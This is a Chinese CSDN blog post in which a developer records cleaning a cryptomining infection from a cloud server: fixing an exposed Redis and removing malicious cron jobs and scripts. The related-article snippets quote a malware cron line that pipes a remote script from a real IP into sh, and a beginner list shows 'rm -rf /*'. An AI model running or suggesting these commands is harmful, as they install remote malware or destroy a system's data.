记录一下本次遇到挖矿病毒的相关处理(是否搞定还看情况...)

最新推荐文章于 2024-07-25 15:50:18 发布
最新推荐文章于 2024-07-25 15:50:18 发布
阅读量316 收藏
点赞数
文章标签: linux centos 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21817483/article/details/104309933
版权

被迫走上运维之路的java开发…
用的是阿里云的esc,这两天服务器频繁爆cpu,上去看了一下是成了别人的矿机,
开头疑是redis对公网开放导致导致黑客利用redis’的未授权访问漏洞,直接获取ECS的Root权限,被黑客利用向磁盘上写入了可疑文件.
由于服务器是交接过来的,环境搭建并不是由我们这边着手的,很多东西也不清楚.
打开redis的配置文件看到bing 127.0.0.1 是被注释掉的,并且密码也很简单…外包果然不靠谱…
所以将前面的 # 去掉,修改密码.
源头处理掉,接下来就是收拾残局了
首先,开头不重视我删掉一些恶意脚本以为就完了,然而隔天又重现了…
上阿里云仔细看了一下
在这里插入图片描述我照着解决方案看了一下,果然cron下有3个计划任务,redis,root,tomcat
其中root如下
在这里插入图片描述
果然…
我查了一下这个ip是德国的
反正不是什么好东西…
把这几个删了
期间还发现一个恶意脚本
在这里插入图片描述更改了几个系统命令,然后杀掉掉了不少系统后台进程
问题还挺多,
总之redis安全加固,然后检查定时任务,删除恶意脚本…重新配置ssh认证…就先这样了,咱也不太懂,毕竟只是个可怜的小后台…
有兴趣了解也可以看看这个
https://www.freebuf.com/column/211777.html

=============华丽的分割线
今天上阿里云看了一下,又有访问恶意域名,肯定有漏掉的东西,除了var/spool/cron之外,etc里面cron.* 之类文件夹里面的计划任务文件也看一下,果然,🤦‍,删了删了.
还有阿里云上面几个灰色的提醒没注意
在这里插入图片描述百度查了一下,还有个networkservice,sysguard,跟之前哪个update.sh一样,都在etc下…
照例chattr -i …然后删掉.
emm…明天再看看

qq_21817483
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
挖矿病毒解决实例(隐藏进程,文章较好)(入侵)
墨痕诉清风的博客
01-06 1万+
CPU起飞了 最近有朋友在群里反馈,自己服务器的CPU一直处于高占用状态,但用top、ps等命令却一直找不到是哪个进程在占用,怀疑中了挖矿病毒,急的团团转。 根据经验,我赶紧让他看一下当前服务器的网络连接,看看有没有可疑连接,果然发现了有点东西: 上Shodan查一下这IP地址: 反向查找,发现有诸多域名曾经解析到这个IP地址: 这是一个位于德国的IP地址,开放了4444,5555,7777等数个特殊的服务端口: 其中这位朋友服务器上发现的连接到的是7777端口,
典型的恶意挖矿恶意代码家族及自查方法.docx
02-11
典型的恶意挖矿恶意代码家族及自查方法
SystemMiner挖矿病毒处理记录
萧洋
02-16 447
SystemMiner挖矿病毒处理记录
排查挖矿病毒
gender123的博客
03-28 4529
场景 最新发现linux服务器一直很卡,导致无法编译和其它相关操作。 排查分析 经top 查看原来是一个叫269 的进程一直抢占CPU,占比高达4000%。而该269 进程则是挖矿病毒进行高度伪装,即使是kill 掉该进程也无济于事,后面又会自动跑起来。 top - 19:29:19 up 1:24, 2 users, load average: 41.71, 41.75, 41.46 Tasks: 891 total, 3 running, 502 sleeping, 0 st..
一次挖矿病毒处理过程
weixin_42433054的博客
12-13 9726
事件背景 深度威胁检测设备发现大量的DNS response of a queried malware Command and Control domain告警事件,尝试进行C&C攻击,根据分析,因终端感染病毒病毒文件尝试访问恶意网址,首先到DNS上进行解析,但是内网DNS无法解析到该域名,导致解析失败,同时该恶意域名被入侵检测设备检测到。现在明确终端中毒,本次过程通过深入发掘通信...
关于网站发现挖矿病毒的通知
mycncart的博客
01-01 1690
这两天有部分客户的opencart系统电商网站陆续出现错误提示,发现是挖矿CoinHive病毒程序所致。 侵入者一般修改了网站前台的Index.php和config.php文件, 同时还会上传一个ftp.php文件 修复方法: 恢复Index.php, config.php,删除其他新上传的文件。 目前初步判断是用户获得了服务器的诸如ftp信息,然后修改上传相关文件。
工业环境勒索与挖矿技术专项解决方案.pptx
01-22
挖矿技术防范解决方案 勒索病毒是一种常见的网络攻击,为了防范勒索病毒,可以采取以下措施: 安装并更新防病毒软件:及时更新防病毒软件,定期扫描计算机。 不要轻易下载不明来源的附件或文件。 避免使用未经...
HW勒索病毒挖矿事件总结模板.docx
08-23
护网HW工作总结报告
教你如何处理杀不掉的病毒.php
12-12
教你如何处理杀不掉的病毒.php 教你如何处理杀不掉的病毒.php
记一次服务器被植入挖矿木马cpu飙升200%解决过程
weixin_33736048的博客
03-29 1075
2019独角兽企业重金招聘Python工程师标准>>> ...
挖矿病毒处理记录
热门推荐
Z.Virgil的博客
08-15 1万+
wnTKYg进程发现 执行top 会发现此进程。 wnTKYg应该是利用 redis 漏洞入侵,加了定时任务,每一段时间向固定地址发送请求,执行挖矿程序后导致 cpu 和带宽升高, kill 进程会自动重启。 检查authorized_keys、known_hosts文件 [root@zfr ~]# cd /root/.ssh [root@zfr ~]# cat auth...
记录一次服务器被挖矿病毒入侵解决办法
a546835886的博客
05-26 1585
1. 昨天发现服务器CPU资源使用率一直100%,我都惊讶了,topyikan有个bash64脚本一直运行,但是kill不掉,文件也删不了,后来百度了一圈终于发现是被挖矿了。。。 2. 定位挖矿就好解决了,查到一篇文章说修改SELINUX,强制访问控制(MAC)安全系统,还真塌麻好使, SELINUX有「disabled」「permissive」,「enforcing」3种选择。 disabled就不用说了 permissive就是Selinux有效,但是即使你违反了策略的话它让你继续操作,但是把
挖矿病毒
weixin_34367257的博客
10-28 2101
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin echo "" > /var/spool/cron/root echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root echo "...
xmrig病毒查杀方法
story-xu的博客
11-19 7874
xmrig病毒查杀报告 一、中毒服务器列表: 192.168.. 二、服务器中毒现象 1、服务器CPU占用异常,如下图: 2、存在异常进程: 三、病毒源 发现如下明显的病毒脚本: 四、查杀过程 1、按照使用cpu对进程进行排序,找到靠前的几个进程: ps aux |sort -rn - k +3|head -n 20 2、找到比较特殊的进程名,如:2.2图 3、杀掉相关进程 4、检查是否有定...
Linux初学基本命令
最新发布
yuan20010401的博客
07-25 586
1、rm 文件名称 删除多个文件多个目录需要用空格 删除根目录(rm -rf /*)1、touch 文件名字 用于linux创建文件 创建多个目录需要用空格隔开。2、mkdir 目录名称 用于创建文件夹 创建多个嵌套文件夹需要用/隔开。1、cp 当前文件 其他目录名称 拷贝文件夹需要在最后 -r。退出不保存时按Esc+:q!1、ls 查看当前目录下面的文件或者文件夹。2、more 文件名称 查看文件更多内容。1、mv 原文件路径 目标文件路径。退出保存时按Esc + :wq。
linux】Shell脚本三剑客之awk命令的详细用法攻略
景天科技苑
07-24 4989
Linux和Unix系统中,awk是一种强大的文本处理工具,广泛应用于数据提取、分析和报告生成。它基于模式匹配和条件执行,能够逐行读取输入文本文件,并对每行数据执行指定的操作。本教程将详细介绍`awk`在shell脚本中的用法,包括其基本语法、常用选项、内置变量、高级特性以及结合shell脚本的实际案例。
60个常见的 Linux 指令
yatingliu的博客
07-25 1311
是 “substitute user” 或 “switch user” 的缩写,它可以让你切换到另一个用户账户,包括 root 用户。是 “manual” 的缩写,通过它你可以访问系统的手册页(manual pages),这些手册页提供了详细的使用说明和参考信息。在一些 Linux 发行版中,adduser 是 useradd 的一个友好封装,功能上类似但提供了更多的默认设置和提示。-f, --force:强制删除,不提示错误信息,即使文件不存在也不会报错。:设置密码过期时间,单位为天。
linux系统的workminer挖矿病毒如何处理
04-15
对于这个问题,我可以给出以下建议:首先,您可以安装杀毒软件对系统进行全面扫描和清理。其次,您可以关闭所有不必要的端口,以减少矿工病毒的入侵风险。最后,您可以采取安全措施来保护您的计算机系统,比如定期更新防病毒软件和系统补丁,以及加强密码安全等。但请注意,以上建议都是基于技术性的分析和参考,具体操作还需根据您的个人实际情况而定。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值